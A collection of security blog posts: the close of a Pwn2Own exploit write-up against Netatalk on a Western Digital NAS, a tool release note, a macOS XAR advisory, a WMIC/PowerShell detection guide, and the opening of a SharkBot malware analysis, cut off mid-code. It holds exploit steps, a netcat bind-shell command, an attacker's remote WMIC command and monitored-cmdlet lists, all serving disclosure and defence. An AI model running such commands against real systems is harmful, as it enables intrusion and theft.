If we look again at the previous backtrace, we see it actually crashed in ad_rebuild_adouble_header_osx(). More specifically we see that the following happens in ad_convert_osx():

  • The original AppleDouble file is mapped in memory with mmap()
  • The previously discussed memmove() is called to discard the FinderInfo part
  • ad_rebuild_adouble_header_osx() is called
  • The mapped file is unmapped with munmap()

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/**
 * Convert from Apple's ._ file to Netatalk
 *
 * Apple's AppleDouble may contain a FinderInfo entry longer then 32 bytes
 * containing packed xattrs. Netatalk can't deal with that, so we
 * simply discard the packed xattrs.
 *
 * As we call ad_open() which might result in a recursion, just to be sure
 * use static variable in_conversion to check for that.
 *
 * Returns -1 in case an error occured, 0 if no conversion was done, 1 otherwise
 **/
static int ad_convert_osx(const char *path, struct adouble *ad)
{
    EC_INIT;
    static bool in_conversion = false;
    char *map;
    int finderlen = ad_getentrylen(ad, ADEID_FINDERI);
    ssize_t origlen;

    if (in_conversion || finderlen == ADEDLEN_FINDERI)
        return 0;
    in_conversion = true;

    LOG(log_debug, logtype_ad, "Converting OS X AppleDouble %s, FinderInfo length: %d",
        fullpathname(path), finderlen);

    origlen = ad_getentryoff(ad, ADEID_RFORK) + ad_getentrylen(ad, ADEID_RFORK);

    map = mmap(NULL, origlen, PROT_READ | PROT_WRITE, MAP_SHARED, ad_reso_fileno(ad), 0);
    if (map == MAP_FAILED) {
        LOG(log_error, logtype_ad, "mmap AppleDouble: %s\n", strerror(errno));
        EC_FAIL;
    }

    memmove(map + ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI,
            map + ad_getentryoff(ad, ADEID_RFORK),
            ad_getentrylen(ad, ADEID_RFORK));

    ad_setentrylen(ad, ADEID_FINDERI, ADEDLEN_FINDERI);
    ad->ad_rlen = ad_getentrylen(ad, ADEID_RFORK);
    ad_setentryoff(ad, ADEID_RFORK, ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI);

    EC_ZERO_LOG( ftruncate(ad_reso_fileno(ad),
                           ad_getentryoff(ad, ADEID_RFORK)
                           + ad_getentrylen(ad, ADEID_RFORK)) );

    (void)ad_rebuild_adouble_header_osx(ad, map);
    munmap(map, origlen);

The ad_rebuild_adouble_header_osx() function is shown below. This function is responsible for writing back the content of the adouble structure into the mapped file region in the AppleDouble format so it is saved into the file on disk.

//netatalk-3.1.12/libatalk/adouble/ad_flush.c
/*!
 * Prepare adbuf buffer from struct adouble for writing on disk
 */
int ad_rebuild_adouble_header_osx(struct adouble *ad, char *adbuf)
{
    uint32_t       temp;
    uint16_t       nent;
    char           *buf;

    LOG(log_debug, logtype_ad, "ad_rebuild_adouble_header_osx");

    buf = &adbuf[0];

    temp = htonl( ad->ad_magic );
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl( ad->ad_version );
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    memcpy(buf, AD_FILLER_NETATALK, strlen(AD_FILLER_NETATALK));
    buf += sizeof( ad->ad_filler );

    nent = htons(ADEID_NUM_OSX);
    memcpy(buf, &nent, sizeof( nent ));
    buf += sizeof( nent );

    /* FinderInfo */
    temp = htonl(EID_DISK(ADEID_FINDERI));
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl(ADEDOFF_FINDERI_OSX);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl(ADEDLEN_FINDERI);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    memcpy(adbuf + ADEDOFF_FINDERI_OSX, ad_entry(ad, ADEID_FINDERI), ADEDLEN_FINDERI);

    /* rfork */
    temp = htonl( EID_DISK(ADEID_RFORK) );
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl(ADEDOFF_RFORK_OSX);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl( ad->ad_rlen);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    return AD_DATASZ_OSX;
}

But if we look at the memcpy() arguments in the debugger, we notice that the source argument actually points relative to the stack and is out of bounds:

memcpy(0x7f423de20032, 0x7fffa499bbba, 32)

(gdb) info proc mappings 
...
          Start Addr           End Addr       Size     Offset objfile
      0x7fffa4923000     0x7fffa4969000    0x46000        0x0 [stack]
      0x7fffa49f9000     0x7fffa49fc000     0x3000        0x0 [vvar]
      0x7fffa49fc000     0x7fffa49fe000     0x2000        0x0 [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 [vsyscall]
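
These numbers can be checked by hand. The Python sketch below sums the field sizes that ad_rebuild_adouble_header_osx() writes before the FinderInfo data, which gives 50 (0x32) bytes. Treating that sum as the value of ADEDOFF_FINDERI_OSX is an assumption on our side, since the definition of that constant is not shown here, but it is consistent with the memcpy() destination ending in 0x32 on a page-aligned mapping. The variable names are illustrative.

```python
# Sizes written by ad_rebuild_adouble_header_osx(), in order.
HEADER_FIELDS = [4, 4, 16, 2]  # magic, version, filler, number of entries
ENTRY_SIZE = 4 + 4 + 4         # entry id, offset, length
NUM_ENTRIES = 2                # FinderInfo and resource fork

# Assumed to equal ADEDOFF_FINDERI_OSX (definition not shown in this post).
finderi_data_off = sum(HEADER_FIELDS) + NUM_ENTRIES * ENTRY_SIZE

# Values copied from the debugger output above.
MEMCPY_DST = 0x7f423de20032
MEMCPY_SRC = 0x7fffa499bbba
MEMCPY_LEN = 32
STACK_START, STACK_END = 0x7fffa4923000, 0x7fffa4969000

map_base = MEMCPY_DST - finderi_data_off
src_in_stack = STACK_START <= MEMCPY_SRC and MEMCPY_SRC + MEMCPY_LEN <= STACK_END
overshoot = MEMCPY_SRC - STACK_END

print(hex(finderi_data_off), hex(map_base), src_in_stack, hex(overshoot))
```

In this crashing run the source lies 0x32bba bytes past the end of the [stack] mapping, which is why the memcpy() faults.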

If you look at the ad_header_read_osx() code previously mentioned, you’ll see that this is confirmed: there is a struct adouble adosx; local variable (hence stored on the stack) that is passed all the way to ad_rebuild_adouble_header_osx().

So what does it mean? Well, the memcpy() copies 32 bytes into the memory mapped file region from an offset we control, relative to a structure on the stack. This means we can make it write memory of our choosing back into the file on disk. Then we can read the fork file (stored in the AppleDouble file format) using SMB, which leaks that content back to us.

That’s nice, but is there any libc.so address stored on the stack since we want to call system() which resides in libc.so?

It turns out there is one such address since main() is called from __libc_start_main():

.text:0000000000023FB0 __libc_start_main proc near 
...
.text:0000000000024099                 call    rax             ; main()
.text:000000000002409B
.text:000000000002409B loc_2409B:                              ; CODE XREF: __libc_start_main+15A↓j
.text:000000000002409B                 mov     edi, eax
.text:000000000002409D                 call    __GI_exit

Wrapping up

By default on the Western Digital PR4100, we can read and write files both in AFP and SMB without requiring authentication, as long as we do it on the Public share.

We also know that an afpd child process is forked from the afpd parent process to handle every client connection. This means that every child process has the same randomisation for all already loaded libraries.

To trigger the vulnerability, we need a regular file named mooncake to exist, as well as a carefully crafted associated ._mooncake fork file in the same directory. Then we can call the "FPOpenFork" command over AFP on the mooncake file and it parses the ._mooncake fork file (stored in the AppleDouble file format). It ends up calling the ad_convert_osx() function, which is responsible for converting Apple’s AppleDouble file to a simplified version implemented in Netatalk.

So we first start by creating the mooncake file. We do it using AFP but we think we could have done it using SMB too. Then we want to trigger the vulnerability twice.

The first time, we craft the ._mooncake fork file to abuse the memcpy() in ad_rebuild_adouble_header_osx(). When triggering the vulnerability:

  • The ._mooncake original fork file is mapped in memory with mmap()
  • The memcpy() function writes the return address in __libc_start_main() into the mapped region
  • The munmap() function is called and that data is saved into the ._mooncake fork file on disk.
  • We can leak that data back to us by reading the ._mooncake fork file over SMB (as if it was a regular file)

This allows deducing the libc.so base address and computing the system() address.
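
The arithmetic behind this step can be sketched in a few lines of Python. The 0x2409B offset is the address of the instruction following the call to main() in the __libc_start_main() listing above, and the leaked and system() addresses are taken from the sample exploit run shown in this post. The function name is illustrative, and the system() offset is derived from that output rather than read from the libc binary, so it only applies to this particular libc-2.28.so build.

```python
RET_OFFSET = 0x2409B  # return address after "call rax" in __libc_start_main


def libc_base_from_leak(leaked_ret: int) -> int:
    """Subtract the known offset of the return address from the leaked value."""
    base = leaked_ret - RET_OFFSET
    if base & 0xFFF:
        # A library base is page aligned; anything else means a bad leak.
        raise ValueError("leak does not yield a page-aligned base")
    return base


LEAKED_RET = 0x7f45e23f809b   # "Leaked libc return address" in the sample run
SYSTEM_ADDR = 0x7f45e24189c0  # "Using system address" in the sample run

base = libc_base_from_leak(LEAKED_RET)
system_offset = SYSTEM_ADDR - base  # derived, specific to this libc build

print(hex(base), hex(system_offset))
```

The alignment check is a cheap way to reject a leak that did not capture the expected return address before moving on to the second stage.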

The second time, we craft the ._mooncake fork file to abuse the memmove() in ad_convert_osx(). When triggering the vulnerability:

  • The ._mooncake original fork file is mapped in memory with mmap()
  • The memmove() function overwrites the ld.so .data section to corrupt the rtld_local._dl_rtld_lock_recursive function pointer with the system() address and the rtld_local._dl_load_lock data with the shell command to execute
  • The memcpy() function crashes due to an invalid access to an unmapped stack address
  • The exception handler registered in Netatalk calls into dl_open() which makes it call system() on our arbitrary shell command

We chose to first drop a statically compiled netcat using SMB and then execute it with the following command: /mnt/HD/HD_a2/Public/tools/netcat -nvlp 9999 -e /bin/sh.

Below is the exploit in action:

# ./mooncake.py -i 192.168.1.3
(12:26:23) [*] Triggering leak...
(12:26:27) [*] Connected to AFP server
(12:26:27) [*] Leaked libc return address: 0x7f45e23f809b
(12:26:27) [*] libc base: 0x7f45e23d4000
(12:26:27) [*] Triggering system() call...
(12:26:27) [*] Using system address: 0x7f45e24189c0
(12:26:27) [*] Connected to AFP server
(12:26:29) [*] Connection timeout detected :)
(12:26:30) [*] Spawning a shell. Type any command.
uname -a
Linux MyCloudPR4100 4.14.22 #1 SMP Mon Dec 21 02:16:13 UTC 2020 Build-32 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) euid=501(nobody) egid=1000(share) groups=1000(share)
pwd
/mnt/HD/HD_a2/Public/edg

Pwn2Own Note

Whilst using the exploit within the competition, it failed on the first attempt during the leak phase. We guessed that this was a timing difference between the competition environment and our test environment. Therefore we modified the code to introduce a ‘sleep()’ before leaking, to ensure that Samba would return the data modified by the vulnerable AFP code. On our second attempt the leak worked but connecting over telnet failed, so we added another ‘sleep()’ before connecting over telnet to ensure that the ‘system()’ command had been executed. Luckily this worked, and we were successful on our third and final attempt, which shows that just adding more sleeps is enough to fix unreliable exploits 🙂

Tool Release – ScoutSuite 5.11.0

We’re proud to announce the release of a new version of our open-source, multi-cloud auditing tool ScoutSuite (on GitHub)!

The most significant improvements and features added include:

  • Core
    • Improved CLI options, test coverage and some dependencies
  • AWS
    • Added new findings for multiple services
    • Bug fixes
    • Added ARNs for all resources
  • Azure
    • Added new findings
    • Bug fixes
  • GCP
    • New ruleset for GCP CIS version 1.1
    • Added support for multiple resources
    • Included a good number of new findings, most of which were added to the default ruleset
    • Bug fixes

Check out the GitHub page for additional information, as well as the wiki documentation!

For those wanting a Software-as-a-Service version, we also offer NCC Scout. This service includes persistent monitoring, as well as coverage of additional services across the three major public cloud platforms. If you would like to hear more, reach out to [email protected] or visit our cyberstore!

Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)

15 March 2022 at 19:34
Vendor: Apple
Vendor URL: https://www.apple.com/
Systems Affected: macOS Monterey before 12.3, macOS Big Sur before 11.6.5 and macOS 10.15 Catalina before Security Update 2022-003
Author: Richard Warren <richard.warren[at]nccgroup[dot]trust>
Advisory URLs: https://support.apple.com/en-us/HT213183, https://support.apple.com/en-us/HT213185, https://support.apple.com/en-gw/HT213185
CVE Identifier: CVE-2022-22582
Risk: 5.0 Medium CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Summary

In October 2021, Apple released a fix for CVE-2021-30833. This was an arbitrary file-write vulnerability in the xar utility and was due to improper handling of path separation (forward-slash) characters when processing files contained within directory symlinks.

Whilst analysing the patch for CVE-2021-30833, an additional vulnerability was identified which could allow for arbitrary file-write when unpacking a malicious XAR archive using the xar utility.

Impact

An attacker could construct a maliciously crafted .xar file, which when extracted by a user, would result in files being written to a location of the attacker’s choosing. This could be abused to gain Remote Code Execution.

Details

Following the patch of CVE-2021-30833, files containing a forward-slash within the name property would be converted to a : character instead, as shown in the screenshot below:

As mentioned in the previous advisory, when attempting to extract a .xar file which contains both a directory symlink and a directory with the same name, an error is encountered, as the directory is created before the symlink.

However, after some experimentation, it was noted that xar processes the Table of Contents (TOC) backwards. This is demonstrated in the following example.

First, we create a .xar file with a TOC containing three entries – a, b, and c:

When listing the contents, we can see that the symlink directory ‘c’ is processed first:

This means that putting a directory symlink before the real directory (i.e., first from the top-down) within the TOC would cause it to fail with the message shown previously – since xar will refuse to create a symlink if a directory with the same name already exists – at which point it will skip over the symlink creation and just write the file to the real directory instead.

However, if we put the symlink directory at the end of the TOC, this will cause the symlink directory creation to succeed but the real-directory creation to fail – but, crucially, xar continues execution anyway, creating the file within our newly-created symlink-directory.

In summary, this means if we create a TOC with a symlink directory at the end, and a directory containing a file at the beginning, we can cause xar to:

  1. First create the symlink directory
  2. Try to create the directory (and fail, but continue)
  3. Write the file into our symlink directory (achieving arbitrary file-write)
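
The ordering issue described above can be illustrated with a small Python toy model. This is not xar's code and it does not touch the filesystem; it only mimics the three behaviours described in this advisory (reverse TOC processing, refusing to create a symlink over an existing directory, and continuing after a failed directory creation). The entry format, the function name and the directory name x are hypothetical.

```python
def simulate_extract(toc):
    """Return the paths that files would be written to, per the toy model."""
    created = {}   # name -> ("directory", None) or ("symlink", target)
    written = []
    for entry in reversed(toc):  # the TOC is processed bottom-up
        name = entry["name"]
        if entry["type"] == "symlink":
            if name in created:
                continue  # symlink creation is refused and skipped
            created[name] = ("symlink", entry["target"])
        elif entry["type"] == "directory":
            if name not in created:
                created[name] = ("directory", None)
            # If creation failed because the name already exists,
            # extraction still carries on with the directory's files.
            kind, target = created[name]
            parent = target if kind == "symlink" else name
            for child in entry.get("children", []):
                written.append(f"{parent}/{child}")
    return written


directory = {"type": "directory", "name": "x", "children": ["test"]}
symlink = {"type": "symlink", "name": "x", "target": "/tmp"}

safe_order = simulate_extract([symlink, directory])     # symlink listed first
exploit_order = simulate_extract([directory, symlink])  # symlink listed last
print(safe_order, exploit_order)
```

With the symlink listed last in the TOC, the model writes through the symlink target, which matches the arbitrary file-write described in the three steps above.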

The following is an example of a TOC which exploits this vulnerability:

Now when extracting this file, we can see that the file /tmp/test is created successfully:

Recommendation

Upgrade to macOS Monterey 12.3, macOS Big Sur 11.6.5, macOS 10.15 Security Update 2022-003, or later.

Vendor Communication

2021-10-28 – Reported to Apple.
2022-03-14 – macOS 12.3, 11.6.5 and Security Update 2022-003 released, and Apple advisory published.
2022-03-15 – NCC Group advisory published.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2022-03-15

Written by:  Richard Warren

Microsoft announces the WMIC command is being retired, Long Live PowerShell

10 March 2022 at 01:15

Category:  Detection and Threat Hunting

What is WMIC?

The Windows Management Instrumentation (WMI) Command-Line Utility (WMIC) is a command-line utility that allows users to perform WMI operations from a command prompt. WMI is an interface providing a variety of Windows management functions. Applications and WMI scripts can be deployed to automate administrative tasks on remote computers or interface with other Windows tools like System Center Operations Manager (SCOM) or Windows Remote Management (WinRM).

Unfortunately for defenders, default WMIC logging is minimal, and WMIC primarily runs directly in memory without writing any files to disk. Due to WMI’s built-in capabilities and small forensic surface area, attackers often weaponize WMI for all facets of the post-exploit attack chain.

Malicious WMIC Usage

  • cmd.exe /c "wmic /node:"10.123.34.123" /user:"WorkGroup\Bob-admin" /password:"Summer2022" PROCESS CALL CREATE "cmd.exe /c C:\ProgramData\regit.bat" >> C:\WINDOWS\TEMP\cb66E3.tmp

In the example above, an attacker has already gained Administrator privileges to execute a WMIC command. Here, the actor launches a malicious payload against a remote host and saves the results to a temp file. Fortunately for defenders, if command line audit logging is enabled, the Windows Security log would capture this execution under event ID 4688. However, these actions would not have been captured if the attacker simply called “wmic” and conducted their operations within the WMI console. Nothing is logged for commands run inside the console, making it a good tool for attackers to live off the land with little fear of detection.

Goodbye WMIC, Hello PowerShell

Microsoft is reportedly no longer developing the WMIC command-line tool, and it will be removed from Windows 11, 10, and Server builds going forward. However, WMI functionality will still be available via PowerShell. So now is a great time to consider how attackers will adjust to these developments and start tuning your detections accordingly.

Preparation

The default settings of Windows logging will rarely catch advanced attacks.  Therefore, Windows Advanced Audit Logging and PowerShell Audit Logging must be configured to collect the events needed to detect and threat hunt for malicious WMI and similar attacks.

Organizations should have a standard procedure to configure the Windows Advanced Audit Policies as a part of a complete security program and have each Windows system collect locally significant events.  NCC Group recommends using the following resources to configure Windows Advanced Audit Policies:

  • Malware Archaeology Windows Logging Cheat Sheets
  • Malware Archaeology Windows PowerShell Logging Cheat Sheet

Log rotation can be another major issue with Windows default log settings.  By leveraging Group Policy, organizations should increase the default log size to support detection engineering and threat hunting, as outlined below.

Ideally, organizations should forward event logs to a log management or SIEM solution to operationalize detection alerts and provide a central console where threat hunting can be performed.  Alternatively, with optimally configured log sizes, teams can run tools such as PowerShell or LOG-MD to hunt for malicious activity against the local log data as well.  Properly configured logging will save time during incident response activities, allowing an organization to recover faster and spend less money on investigative and recovery efforts.

Detection and Threat Hunting Malicious WMI in PowerShell logging

WMI will generate log events that can be used to detect and hunt for indications of execution.  To collect Event ID 4104, the Windows PowerShell Audit Policy will need to have the following policy enabled:

  • PowerShell version 5 or later must be installed
    • Requires .Net 4.5 or later
  • Minimum Log size – 1,024,000kb or larger
  • There are two PowerShell logs
    • Windows PowerShell (legacy)
    • Applications and Services Logs – Microsoft-Windows-PowerShell/Operational
  • The following Group Policy must be set
    • ModuleLogging Reg_DWord =1 or ENABLED
    • ModuleNames Reg_Sz – Value = * and Data = *
    • ScriptBlockLogging Reg_DWord =1 or ENABLED

The following query logic can be used:

  • Event Log = PowerShell/Operational
  • Event IDs = 4100, 4103, 4104
  • User = Any user, especially administrative accounts
  • Path = Look for odd paths or PowerShell scripts
  • ScriptBlock = What was actually executed on the system that will contain the cmdlets listed below

WMI PowerShell cmdlets

The following PowerShell cmdlets should be monitored for suspicious/malicious activity:

  • Cmdlet          Get-WmiObject
  • Cmdlet          Invoke-WmiMethod
  • Cmdlet          Register-WmiEvent
  • Cmdlet          Remove-WmiObject
  • Cmdlet          Set-WmiInstance

The following PowerShell CIM (Common Information Model) cmdlets should also be monitored, as they replace the older WMI cmdlets:

  • Cmdlet          Export-BinaryMiLog
  • Cmdlet          Get-CimAssociatedInstance
  • Cmdlet          Get-CimClass
  • Cmdlet          Get-CimInstance
  • Cmdlet          Get-CimSession
  • Cmdlet          Import-BinaryMiLog
  • Cmdlet          Invoke-CimMethod
  • Cmdlet          New-CimInstance
  • Cmdlet          New-CimSession
  • Cmdlet          New-CimSessionOption
  • Cmdlet          Register-CimIndicationEvent
  • Cmdlet          Remove-CimInstance
  • Cmdlet          Remove-CimSession
  • Cmdlet          Set-CimInstance        

Sample Log Management Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

event.provider="Microsoft-Windows-PowerShell" AND event.code=4104
// PowerShell WMI commandlets
(winlog.event_data.ScriptBlockText="*Get-WmiObject*") or (winlog.event_data.ScriptBlockText="*Invoke-WmiMethod*") or (winlog.event_data.ScriptBlockText="*Register-WmiEvent*") or (winlog.event_data.ScriptBlockText="*Remove-WmiObject*") or (winlog.event_data.ScriptBlockText="*Set-WmiInstance*")
| UserName:=winlog.user.name
| Domain:=winlog.user.domain
| ScriptBlock:=winlog.event_data.ScriptBlockText
| User_Type:=winlog.user.type
| PID:=winlog.process.pid
| Task:=winlog.task
| Path:=winlog.event_data.Path
| OpCode:=winlog.opcode
| table([@timestamp, host.name, UserName, Domain, User_Type, Path, Task, OpCode, ScriptBlock])
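
For teams hunting against exported log data rather than in a log management console, the same matching logic can be sketched in Python. This is a minimal illustration and not part of any product: the function name is hypothetical, the input is assumed to be the ScriptBlockText string of an Event ID 4104 record, and the cmdlet names are those listed in this post. Matching is case-insensitive because PowerShell cmdlet names are, and like the wildcard query it is a plain substring match.

```python
WMI_CMDLETS = [
    "Get-WmiObject", "Invoke-WmiMethod", "Register-WmiEvent",
    "Remove-WmiObject", "Set-WmiInstance",
]
CIM_CMDLETS = [
    "Export-BinaryMiLog", "Get-CimAssociatedInstance", "Get-CimClass",
    "Get-CimInstance", "Get-CimSession", "Import-BinaryMiLog",
    "Invoke-CimMethod", "New-CimInstance", "New-CimSession",
    "New-CimSessionOption", "Register-CimIndicationEvent",
    "Remove-CimInstance", "Remove-CimSession", "Set-CimInstance",
]


def matched_cmdlets(script_block_text: str) -> list:
    """Return the monitored cmdlets that appear in a script block."""
    lowered = script_block_text.lower()
    return [c for c in WMI_CMDLETS + CIM_CMDLETS if c.lower() in lowered]


# Hypothetical script block texts, for illustration only.
samples = [
    "get-wmiobject -Class Win32_LogicalDisk",
    "Invoke-CimMethod -ClassName Win32_Process -MethodName Create",
    "Write-Host 'hello'",
]
for text in samples:
    print(matched_cmdlets(text), "<-", text)
```

Unlike the sample query, this sketch also covers the CIM cmdlets. Because it is a substring match, a longer name such as New-CimSessionOption also reports New-CimSession.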

Detection Engineering – Filtering Known Good

Once an output of all WMI PowerShell cmdlets is produced, you can start filtering known good activity to narrow the results to suspicious activity. Take the following example:

The following is a typical result that might be seen in the logs, and in this case excluded as a false positive or known good to reduce results.  The path of the PowerShell script or the actual PowerShell executed (ScriptBlock) is what to focus on.

In this example, our focus is on the highlighted PowerShell executed (ScriptBlock). Here the command is just checking the disk for an install routine, which is typical on a Windows system. From here, you can begin building out your detection logic to better find suspicious WMI PowerShell activity and support threat hunting efforts. Pay close attention to the names of the scripts, the location from which each script executes, the context of the user executing the script, the number of systems the script runs on, and the calls being used in order to filter out the known good items. Generally, directories to which users have read-write access, such as C:\Users, should be closely reviewed.
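The filtering idea can be sketched offline in Python, for example against events exported from the log platform. This is only an illustration under stated assumptions: the event is taken to be a dictionary with `ScriptBlockText` and `Path` keys (mirroring the fields in the query), the vendor path in the allow-list is hypothetical, and the `triage` function and its result labels are made up for this example.

```python
import re

# Cmdlet names taken from the WMI and CIM lists in this post (not exhaustive).
WMI_CIM_CMDLETS = [
    "Get-WmiObject", "Invoke-WmiMethod", "Register-WmiEvent",
    "Remove-WmiObject", "Set-WmiInstance",
    "Get-CimInstance", "Invoke-CimMethod", "New-CimInstance",
    "Register-CimIndicationEvent", "Remove-CimInstance", "Set-CimInstance",
]
CMDLET_RE = re.compile("|".join(re.escape(c) for c in WMI_CIM_CMDLETS), re.IGNORECASE)

# Hypothetical allow-list of script locations reviewed and accepted as known good.
KNOWN_GOOD_PREFIXES = ("c:\\program files\\examplevendor\\",)
# User-writable locations that deserve a closer look first.
USER_WRITABLE_PREFIXES = ("c:\\users\\",)


def triage(event: dict) -> str:
    """Classify one script block logging event (assumed dict layout)."""
    script = event.get("ScriptBlockText") or ""
    path = (event.get("Path") or "").lower()
    if not CMDLET_RE.search(script):
        return "ignore"          # no WMI/CIM cmdlet in the script block
    if path.startswith(USER_WRITABLE_PREFIXES):
        return "review_first"    # executed from a user-writable directory
    if path.startswith(KNOWN_GOOD_PREFIXES):
        return "known_good"      # matches the allow-list
    return "review"
```

In practice the allow-list would be built up gradually from the reviewed results, and would usually also take the user context and the number of hosts into account.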

Conclusion

WMI and WMIC have been consistent attack vectors since their introduction. With the deprecation of WMIC, malicious use of WMI functionality through PowerShell will likely increase. We hope this information can assist your detection and threat hunting efforts to detect this and similar types of attacks. Happy Detection and Hunting!

Additional Reading and Resources

SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store


Authors:

  • Alberto Segura, Malware analyst
  • Rolf Govers, Malware analyst & Forensic IT Expert

NCC Group, as well as many other researchers, noticed a rise in Android malware last year, especially Android banking malware. Within the Threat Intelligence team of NCC Group we’re looking closely at several of these malware families to provide valuable information to our customers about these threats. Besides the more popular Android banking malware, NCC Group’s Threat Intelligence team also watches new trends and new families that arise and could be potential threats to our customers.

One of these ‘newer’ families is an Android banking malware called SharkBot. During our research we noticed that this malware was distributed via the official Google play store. After discovery we immediately notified Google and decided to share our knowledge via this blog post.

NCC Group’s Threat Intelligence team continues to analyze SharkBot and uncover new findings. Shortly after we published this blogpost, we found several more SharkBot droppers in the Google Play Store. All appear to behave identically; in fact, the code seems to be a literal ‘copy-paste’ in all of them. The same corresponding C2 server is also used in all the other droppers. After discovery we immediately reported this to Google. See the IoCs section below for the Google Play Store URLs of the newly discovered SharkBot dropper apps.

Summary

SharkBot is an Android banking malware found at the end of October 2021 by the Cleafy Threat Intelligence Team. At the moment of writing the SharkBot malware doesn’t seem to have any relations with other Android banking malware like Flubot, Cerberus/Alien, Anatsa/Teabot, Oscorp, etc.

The Cleafy blogpost stated that the main goal of SharkBot is to initiate money transfers (from compromised devices) via Automatic Transfer Systems (ATS). As far as we observed, this is an advanced attack technique which isn’t used regularly within Android malware. It enables adversaries to auto-fill fields in legitimate mobile banking apps and initiate money transfers, whereas other Android banking malware, like Anatsa/Teabot or Oscorp, requires a live operator to insert and authorize money transfers. This technique also allows adversaries to scale up their operations with minimum effort.

The ATS features allow the malware to receive a list of events, which are then simulated in order to perform the money transfers. Since these features can be used to simulate touches/clicks and button presses, they can be used not only to automatically transfer money but also to install other malicious applications or components. This is the case for the SharkBot version that we found in the Google Play Store, which seems to be a reduced version of SharkBot with the minimum required features, such as ATS, to install a full version of the malware some time after the initial install.

Because the malware is distributed via the Google Play Store as a fake antivirus, we found that the threat actors rely on infected devices to spread the malicious app. SharkBot achieves this by abusing the ‘Direct Reply‘ Android feature, which is used to automatically reply to incoming notifications with a message to download the fake antivirus app. This spreading strategy, abusing the Direct Reply feature, was recently seen in another banking malware called Flubot, discovered by ThreatFabric.

What is interesting and different from the other families is that SharkBot likely uses ATS to also bypass multi-factor authentication mechanisms, including behavioral detection like bio-metrics, while at the same time it also includes more classic features to steal user’s credentials.

Money and Credential Stealing features

SharkBot implements the four main strategies to steal banking credentials in Android:

  • Injections (overlay attack): SharkBot can steal credentials by showing a WebView with a fake login website (phishing) as soon as it detects the official banking app has been opened.
  • Keylogging: SharkBot can steal credentials by logging accessibility events (related to text field changes and button clicks) and sending these logs to the command and control server (C2).
  • SMS intercept: SharkBot has the ability to intercept/hide SMS messages.
  • Remote control/ATS: SharkBot has the ability to obtain full remote control of an Android device (via Accessibility Services).

For most of these features, SharkBot needs the victim to enable the Accessibility Permissions & Services. These permissions allow Android banking malware to intercept all the accessibility events produced by the user’s interaction with the User Interface, including button presses, touches, TextField changes (useful for the keylogging features), etc. The intercepted accessibility events also make it possible to detect the foreground application, so banking malware also uses these permissions to detect when a targeted app is open, in order to show the web injections that steal the user’s credentials.

Delivery

SharkBot is distributed via the Google Play Store, but also using something relatively new in Android malware: the ‘Direct reply‘ feature for notifications. With this feature, the C2 can provide a message to the malware, which is then used to automatically reply to incoming notifications received on the infected device. This was recently introduced by Flubot to distribute the malware using the infected devices, and it seems the SharkBot threat actors have also included this feature in recent versions.

In the following image we can see the code of SharkBot used to intercept new notifications and automatically reply to them with the message received from the C2.

In the following picture we can see the ‘autoReply’ command received by our infected test device, which contains a shortened Bit.ly link that redirects to the Google Play Store sample.

We detected the reduced SharkBot version published in Google Play on 28th February, but its last update was on 10th February, so the app had already been published for some time. This reduced version uses a very similar protocol to communicate with the C2 (RC4 to encrypt the payload and a public RSA key to encrypt the RC4 key, so the C2 server can decrypt the request and encrypt the response using the same key). This SharkBot version, which we can call SharkBotDropper, is mainly used to download a fully featured SharkBot from the C2 server, which is then installed using the Automatic Transfer System (ATS) (simulating clicks and touches with the Accessibility permissions).

This malicious dropper is published in the Google Play Store as a fake Antivirus, which really has two main goals (and commands to receive from C2):

  • Spread the malware using the ‘Auto reply’ feature: It can receive an ‘autoReply’ command with the message that should be used to automatically reply to any notification received on the infected device. During our research, it has been spreading the same Google Play dropper via a shortened Bit.ly URL.
  • Dropper+ATS: The ATS features are used to install the downloaded SharkBot sample obtained from the C2. In the following image we can see the decrypted response received from the C2, in which the dropper receives the command ‘b‘ to download the full SharkBot sample from the provided URL and the ATS events to simulate in order to get the malware installed.

With this command, the app installed from the Google Play Store is able to install and enable Accessibility Permissions for the fully featured SharkBot sample it downloaded. It will be used to finally perform the ATS fraud to steal money and credentials from the victims.

The fake Antivirus app, the SharkBotDropper, published in the Google Play Store has more than 1,000 downloads, and some fake comments like ‘It works good’, but also other comments from victims that realized that this app does some weird things.

Technical analysis

Protocol & C2

The protocol used to communicate with the C2 servers is HTTP based. The HTTP requests are sent in plaintext, since the malware doesn’t use HTTPS. Even so, the actual payload with the information sent and received is encrypted using RC4. The RC4 key used to encrypt the information is randomly generated for each request, and encrypted using the RSA public key hardcoded in each sample. That way, the C2 can decrypt the encrypted key (rkey field in the HTTP POST request) and finally decrypt the sent payload (rdata field in the HTTP POST request).
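For analysts who want to decrypt captured traffic, the envelope scheme can be sketched in Python. This is not SharkBot's code: the RC4 routine is the standard algorithm, while the 16-byte key length, the raw-bytes field encoding, and the `wrap_key` callable (a stand-in for the RSA public-key encryption, which is not part of the Python standard library) are assumptions made for illustration.

```python
import os


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4; the same call encrypts and decrypts."""
    # Key-scheduling algorithm (KSA)
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
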